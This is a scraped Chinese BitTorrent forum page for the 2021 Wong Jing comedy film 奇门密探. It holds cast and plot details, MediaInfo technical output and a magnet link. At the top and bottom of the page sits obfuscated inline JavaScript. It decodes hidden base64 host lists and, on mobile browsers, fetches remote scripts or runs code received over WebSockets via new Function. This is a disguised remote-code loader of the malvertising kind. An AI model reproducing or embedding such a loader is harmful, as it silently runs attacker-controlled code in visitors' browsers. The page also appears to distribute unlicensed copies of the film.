奇门密探[国语配音/中文字幕].Qi.Men.Mi.Tan.2021.1080p.WEB-DL.H265.DDP2.0-bt9527.cc 1.85GB

版主小s 18天前 162

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 奇门密探

◎年 代 2021

◎产 地 中国大陆

◎语 言 汉语普通话 / 粤语

◎上映日期 2021-11-13(中国大陆网络)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣链接 https://movie.douban.com/subject/35656223/

◎片 长 86分钟

◎导 演 王晶 Jing Wong (id:1274331)

张敏 Aman Chang (id:1320966)

◎编 剧 王晶 Jing Wong (id:1274331)

◎演 员 邱意浓 Sabrina Qiu (id:1335402)

甄琪 Zhenqi Qi (id:1378123)

胡然 Michelle Hu (id:1328398)

孟瑶 Yao Meng (id:1314726)

苑琼丹 King-Tan Yuen (id:1274445)

陈浩民 Ho-Man Chan (id:1274567)

罗家英 Kar-Ying Law (id:1108968)

何浩文 Dominic Ho (id:1346307)

林子善 Chi-Sing Lam (id:1314861)

李嘉 Oscar Li (id:1385191)

文凯玲 Connie Man (id:1348030)

桂晶晶 Jingjing Gui (id:1380081)

解斯童 Sitong Xie (id:1417782)

方敏婷 Natalie Fong (id:1424317)

汤加文 Carmen Tong (id:1358039)

王宝葆 Lukian Wang (id:1357585)

冼国华 (id:1463985)

◎标 签 王晶 / 整蛊专家 / 恶搞 / 录像鸡 / 张敏 / 延喜笑传 / 夺你命3000 / 2021

◎简 介

奇门派和五毒派为江湖两大门派。两大门派为了“皇家龙种花落谁家”而各施其法,误打误撞地揭发了企图让皇帝(陈浩民饰)得不到子嗣而待其驾崩后坐上皇位的皇叔的阴谋。皇叔派出潜伏在皇后(胡然)身边的五毒派弟子秀明(甄淇饰)试图毒害皇嗣,而秀明却阴险狡猾另有企图,对皇叔并不忠心,趁机为己谋私利。反而奇门派的多美(邱意浓饰),为人善良,大大咧咧,总是乐从天降,化险为夷,更对权势亳不留恋,倾心于英俊勇猛的萌笨直男侍卫太阳(何浩文饰),二人合力化解皇叔之乱,不恋名利,欢天喜地浪迹天涯。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 79103361956556673023659308296617642685 (0x3B82C0DB81546A1F6851C28FA9F8CABD)

  4. Complete name : 奇门密探[email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 1.85 GiB

  8. Duration : 1 h 26 min

  9. Overall bit rate : 3 060 kb/s

  10. Encoded date : UTC 2021-11-14 10:49:39

  11. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 26 min

  20. Bit rate : 2 963 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.079

  30. Stream size : 1.79 GiB (97%)

  31. Default : Yes

  32. Forced : No


  33. Audio

  34. ID : 2

  35. Format : E-AC-3

  36. Format/Info : Enhanced AC-3

  37. Commercial name : Dolby Digital Plus

  38. Codec ID : A_EAC3

  39. Duration : 1 h 26 min

  40. Bit rate mode : Constant

  41. Bit rate : 96.0 kb/s

  42. Channel(s) : 2 channels

  43. Channel layout : L R

  44. Sampling rate : 48.0 kHz

  45. Frame rate : 31.250 FPS (1536 SPF)

  46. Compression mode : Lossy

  47. Stream size : 59.4 MiB (3%)

  48. Service kind : Complete Main

  49. Default : Yes

  50. Forced : No


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:4861C4B713AAE8860EC600B5CF257A91167BB234

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};